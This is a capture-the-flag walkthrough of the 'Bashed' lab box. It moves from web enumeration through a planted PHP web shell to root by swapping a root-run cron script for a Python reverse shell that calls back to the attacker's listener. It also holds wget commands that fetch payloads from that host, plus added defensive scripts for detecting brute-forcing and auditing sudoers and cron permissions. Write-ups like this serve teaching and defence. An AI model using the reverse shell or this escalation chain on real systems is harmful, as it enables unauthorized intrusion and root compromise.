Another OSCP-like Box: Bashed

@ro0taddict
6 min read · Apr 2, 2021

This is my fifth writeup for this series.

Enumeration

As usual, I started my enumeration with Nmap.

sudo nmap -sC -sV 10.10.10.68 -oA default-scan

I only saw TCP port 80 on this box. I then ran Masscan to confirm all open TCP ports.

sudo masscan -p1-65535 -e tun0 10.10.10.68

Since HTTP was running on the host, I then used Gobuster to check for any exposed folders.

sudo apt install gobuster

sudo gobuster dir -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
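Directory brute-forcing of the kind Gobuster does leaves a clear trace in the web server's access log: one client producing a burst of 404s for distinct paths. The script below is an added example (not part of the original writeup) that parses combined-format access log lines and flags any client exceeding a threshold of distinct 404 paths in a minute. The sample log lines are constructed here (they reuse the writeup's attacker IP 10.10.14.7 and Gobuster's default `gobuster/<version>` user agent), and the 20-per-minute threshold is an assumption to tune per site.

```python
# Added example, not from the original writeup: spot directory brute-forcing
# (Gobuster, Dirb and similar) in a combined-format web access log by counting
# distinct 404 paths per client IP per minute. The log lines are constructed;
# the threshold of 20 misses per minute is an assumption to tune per site.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format access log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_bruteforce(lines, threshold=20):
    """Return [(ip, minute, distinct_404_paths)] for clients at or over the threshold."""
    misses = defaultdict(set)  # (ip, minute) -> distinct paths that returned 404
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        minute = rec["ts"].replace(second=0).isoformat()
        misses[(rec["ip"], minute)].add(rec["path"])
    hits = [(ip, minute, len(paths)) for (ip, minute), paths in misses.items()
            if len(paths) >= threshold]
    return sorted(hits, key=lambda h: (h[1], h[0]))


def constructed_log():
    """Constructed sample: one client hammering unknown paths, one browsing normally."""
    fmt = ('{ip} - - [02/Apr/2021:10:15:{sec:02d} +0000] "GET {path} HTTP/1.1" '
           '{status} 123 "-" "{ua}"')
    lines = [fmt.format(ip="10.10.14.7", sec=i, path=f"/guess-{i}", status=404,
                        ua="gobuster/3.1.0") for i in range(25)]
    lines += [fmt.format(ip="192.0.2.10", sec=30 + i, path=p, status=200,
                         ua="Mozilla/5.0")
              for i, p in enumerate(["/", "/index.html", "/about"])]
    return lines


if __name__ == "__main__":
    for ip, minute, count in find_bruteforce(constructed_log()):
        print(f"{ip} returned {count} distinct 404s in minute {minute}")
```

Counting distinct paths rather than raw requests keeps a single broken link that is refreshed repeatedly from tripping the rule; the same bucketing can be fed from a tail of the live log instead of the constructed list.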

I browsed the exposed folders and saw some interesting files in /dev directory.

The phpbash.php was some type of a webshell.

Exploitation

I ran “id” to check my privilege of this web shell.

Since the box runs PHP script, I then used a PHP reverse shell script from Pentestmonkey.

locate php-reverse-shell

cp /usr/share/laudanum/php/php-reverse-shell.php .

I then changed the IP in the script to the IP of my Kali.

nano php-reverse-shell.php

I saved the edited script and ran SimpleHTTPServer to host the file.

sudo python -m SimpleHTTPServer 80

In the webshell, I transferred the php-reverse-shell script to Bashed using wget. The default directory, /var/www/html/dev, is not writable, so I changed my directory to /dev/shm.

cd /dev/shm

wget http://10.10.14.7/php-reverse-shell.php

Listener

I then set up a Netcat listener on port 8888 in another terminal.

I executed the script to get a reverse shell access.

php php-reverse-shell.php

I upgraded my access to an interactive shell by following this link.

whoami&&id&&hostname

Post Exploitation

Next, I moved on to escalating my privileges to root. I used a tool called Linux Smart Enumeration from Github.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh

I transferred Linux Smart Enumeration to /dev/shm in Bashed.

wget http://10.10.14.7/lse.sh

I then executed the script using the command below.

bash lse.sh -i

I noticed that sudo could be used to run commands as the scriptmanager user with no password. I immediately switched to scriptmanager.

sudo -i -u scriptmanager
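The finding above comes from a sudoers rule carrying the NOPASSWD tag. As an added example (not from the original writeup), the script below parses sudoers-format text and reports every user who can run commands without a password, rating a rule that grants ALL as high severity. SAMPLE_SUDOERS is constructed for the example and is not the box's real configuration.

```python
# Added example, not from the original writeup: audit a sudoers file for rules
# that grant commands without a password (the NOPASSWD tag), which is the kind
# of finding lse.sh surfaced here. SAMPLE_SUDOERS is constructed for the
# example and is not the box's real configuration.
import re

TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV"}
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)


def commands_without_password(spec):
    """Return the commands in a Cmnd_Spec list that carry NOPASSWD.
    A tag applies to its command and to the following commands until changed."""
    nopasswd, cmds = False, []
    for item in spec.split(","):
        item = item.strip()
        # peel off leading TAG: prefixes (e.g. "NOPASSWD: SETENV: /bin/ls")
        while ":" in item and item.split(":", 1)[0].strip().upper() in TAGS:
            tag, item = (part.strip() for part in item.split(":", 1))
            if tag.upper() == "NOPASSWD":
                nopasswd = True
            elif tag.upper() == "PASSWD":
                nopasswd = False
        if nopasswd and item:
            cmds.append(item)
    return cmds


def find_nopasswd_rules(text):
    """Return a list of findings, one per user specification with NOPASSWD commands."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments (#include lines are skipped too)
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = commands_without_password(m["spec"])
        if cmds:
            runas = re.sub(r"\s+", "", m["runas"] or "root")  # sudo defaults to root
            findings.append({
                "user": m["user"],
                "runas": runas,
                "commands": cmds,
                "severity": "high" if "ALL" in cmds else "medium",
            })
    return findings


SAMPLE_SUDOERS = """\
# constructed sample, not the box's real sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
webuser ALL=(scriptmanager : scriptmanager) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: /bin/systemctl
"""

if __name__ == "__main__":
    for f in find_nopasswd_rules(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['user']} -> {f['runas']}: {', '.join(f['commands'])}")
```

Run it against `/etc/sudoers` and the files under `/etc/sudoers.d/` as root; a NOPASSWD: ALL rule that only switches to a low-privileged account still matters when, as on this box, that account owns something root executes.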

I ran Linux Smart Enumeration again, but didn't get any results that were useful for privilege escalation. I then downloaded a tool called Pspy, which is useful for checking for running cron jobs. The tool can be downloaded from this Github link.

I transferred the Pspy script to Bashed using Wget.

wget http://10.10.14.7/pspy64s

I then enabled the execute permission of the file and ran it.

chmod +x pspy64s

While running Pspy, I noticed that test.py was running every minute and was executed by root (uid=0).

I then searched for that test.py file. I went to the / directory and ran the commands below. These commands look for directories and files that are writable by scriptmanager.

find / -maxdepth 1 -writable -type f

find / -maxdepth 1 -writable -type d

I checked the /scripts directory and found the test.py script. This script was owned by scriptmanager, so I could change it if need be.

Looking at test.py, this script opens test.txt and writes something to it.

I also noticed that the test.txt created by the test.py script was owned by root. If I could spawn a shell using the test.py script, that shell would have root access. I tried to edit test.py in Bashed but wasn't successful.
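The root cause here is a root cron job executing a file that a non-root user owns, in a directory that user controls. The script below is an added example (not from the original writeup) that audits exactly that: it checks the owner and mode of the scheduled script and of every directory above it, flagging anything a non-root user could edit, rename or replace. assess_cron_target() is a pure function over constructed ownership and mode values so it runs offline; audit_path() applies it to a real path with os.stat(). The uid 1001 and the /scripts layout in WEAK_CASE are constructed stand-ins for the box.

```python
# Added example, not from the original writeup: check whether a script that a
# root cron job executes can be modified or replaced by a non-root user, which
# is the weakness behind the test.py finding. assess_cron_target() is a pure
# function over constructed ownership/mode values so it can be tested offline;
# audit_path() applies it to a real path with os.stat().
import os
import stat


def writable_by_others(mode):
    """True if the group or world write bit is set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def assess_cron_target(run_as_uid, script_owner, script_mode, parents):
    """Return a list of issue strings (empty means nothing found).
    parents: [(path, owner_uid, mode)] for every directory from / down to the
    script's own directory."""
    issues = []
    if script_owner not in (0, run_as_uid):
        issues.append(f"script owned by uid {script_owner} but executed as uid "
                      f"{run_as_uid}: that owner controls what runs as uid {run_as_uid}")
    if writable_by_others(script_mode):
        issues.append("script is group- or world-writable")
    for path, owner, mode in parents:
        if owner not in (0, run_as_uid):
            issues.append(f"{path} is owned by uid {owner}: the script can be renamed "
                          "or replaced")
        if writable_by_others(mode):
            sticky = ("sticky bit set, so only the file owner can rename or delete it"
                      if mode & stat.S_ISVTX else "no sticky bit")
            issues.append(f"{path} is group- or world-writable ({sticky})")
    return issues


def audit_path(script_path, run_as_uid=0):
    """Stat a real script and every directory above it, then assess."""
    script_path = os.path.realpath(script_path)
    st = os.stat(script_path)
    parents, cur = [], os.path.dirname(script_path)
    while True:
        pst = os.stat(cur)
        parents.append((cur, pst.st_uid, pst.st_mode))
        parent = os.path.dirname(cur)
        if parent == cur:  # reached /
            break
        cur = parent
    return assess_cron_target(run_as_uid, st.st_uid, st.st_mode, parents[::-1])


# Constructed values modelled on the writeup: root runs /scripts/test.py, and the
# file and its directory belong to a non-root uid (1001 stands in for scriptmanager).
WEAK_CASE = dict(run_as_uid=0, script_owner=1001, script_mode=0o100644,
                 parents=[("/", 0, 0o40755), ("/scripts", 1001, 0o40755)])
SAFE_CASE = dict(run_as_uid=0, script_owner=0, script_mode=0o100755,
                 parents=[("/", 0, 0o40755), ("/scripts", 0, 0o40755)])

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        issues = audit_path(sys.argv[1])  # e.g. a path taken from root's crontab
    else:
        issues = assess_cron_target(**WEAK_CASE)
    print("\n".join(issues) or "no issues")
```

Directory ownership is checked as well as the file's, because the writeup's own path to root did not edit test.py at all: it renamed the file and dropped a replacement beside it, which only the directory permissions govern. Feeding this check every command path from root's crontab and /etc/cron.* is the mitigation-side equivalent of what Pspy revealed here.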

In another Kali terminal, I created a file named test.py using Nano.

nano test.py

I added the script below, making sure to use the IP address of my Kali.

import socket,subprocess,os
# connect back to the Netcat listener on the Kali machine
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.7",8888))
# point stdin, stdout and stderr at the socket, then hand it an interactive shell
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

In the Bashed terminal running as scriptmanager, I renamed test.py to test.bak.

I then transferred the test.py from Kali to Bashed while I had a Netcat listener running on port 8888.

wget http://10.10.14.7/test.py

After a minute, I got a root shell in the new Netcat listener.

Flags

Key Takeaways

  • Always limit access to files and folders that are very important to the systems or networks.
  • Avoid having a web shell on a server; if there is a need for one, make sure to implement compensating security controls.
  • In this writeup, we used Nmap for enumeration together with Masscan.
  • For directory bruteforcing, we can use tools such as Gobuster, Dirb, Dirsearch, etc.
  • In privilege escalation, we can use automated scripts such as Linux Smart Enumeration and Pspy to look for a possible attack surface.
